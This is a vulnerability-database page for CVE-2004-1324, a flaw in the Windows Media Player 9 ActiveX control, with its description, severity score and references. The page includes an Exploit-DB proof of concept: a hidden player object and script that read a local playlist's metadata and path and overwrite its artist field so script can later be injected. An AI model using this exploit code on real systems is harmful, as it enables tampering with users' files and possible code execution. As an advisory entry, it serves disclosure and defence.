CVE-2004-1324 : Detail

CVE-2004-1324

6.85%V3
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2005-01-06
04h00 +00:00
2017-07-10
12h57 +00:00
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CVE Descriptions

The Microsoft Windows Media Player 9.0 ActiveX control may allow remote attackers to execute arbitrary web script in the Local computer zone via the (1) artist or (2) song fields of a music file, if the file is processed using Internet Explorer.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N [email protected]

EPSS

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Exploit information

Exploit Database EDB-ID : 25031

Publication date : 2004-12-17 23h00 +00:00
Author : Arman Nayyeri
EDB Verified : Yes

source: https://www.securityfocus.com/bid/12031/info The Windows Media Player ActiveX control is prone to a security weakness. The issue is that the control may be abused by a Web page to change attributes of media files (such as MP3). An attacker can influence attributes such as the artist, song name, or album name. It is possible to exploit this weakness to inject malicious script code into these attributes. If this issue was combined with a vulnerability that could force Internet Explorer to interpret the injected script code, it may be possible to execute malicious script code in the Local Zone. Such an attack would lead to execution of arbitrary code on computers that do not have this Zone locked down. This issue is reported to affect Windows Media Player 9. It reportedly does not work on computers running Windows XP SP2 when the attack is executed from a remote source. This is likely due to additional browser security measures in Windows XP SP2. <object style="display:none;" classid="clsid:6BF52A52-394A-11D3-B153-00C04F79FAA6" id="WindowsMediaPlayer"> <param name="autoStart" value="1"> <param name="url" value="file://c:\program files\winamp\winamp.m3u"> <param name="mute" value="1"> </object> <script> note = 'Look at yourself and find the mortality of your body'; setTimeout( function(){ if (WindowsMediaPlayer.currentMedia.sourceURL!='c:\\program files\\winamp\\winamp.m3u') { artist = WindowsMediaPlayer.currentMedia.getItemInfo("Artist"); title = WindowsMediaPlayer.currentMedia.getItemInfo("Title"); album = WindowsMediaPlayer.currentMedia.getItemInfo("Album"); texxt = ""; if (artist!=note) { if (artist!="") texxt='I like '+artist+'!\n'; if (title!="") texxt=texxt+'I think '+title+' is the best song'; if ((title!="")&&(album!="")) texxt=texxt+' from '; if (album!="") texxt=texxt+'My favorite album "'+album+'".\n'; else texxt=texxt+'.\n'; texxt=texxt+'I have it on my computer ('+WindowsMediaPlayer.currentMedia.sourceURL+'), I guess you have it too! ;)'; alert(texxt); } WindowsMediaPlayer.currentMedia.setItemInfo("Artist",note); alert('done!\nplay '+WindowsMediaPlayer.currentMedia.sourceURL+' by a player and take a look at artist name, it must be changed!'); WindowsMediaPlayer.controls.stop(); WindowsMediaPlayer.controls.play(); } else alert('Can\'t find winamp default playlist!\nMost probably the winamp is not installed in c:\\program files\\winamp directory.'); } ,2000); </script> </body></html>

Products Mentioned

Configuraton 0

Microsoft>>Windows_media_player >> Version 9

References

http://marc.info/?l=bugtraq&m=110352518211306&w=2
Tags : mailing-list, x_refsource_BUGTRAQ
http://www.securityfocus.com/bid/12031
Tags : vdb-entry, x_refsource_BID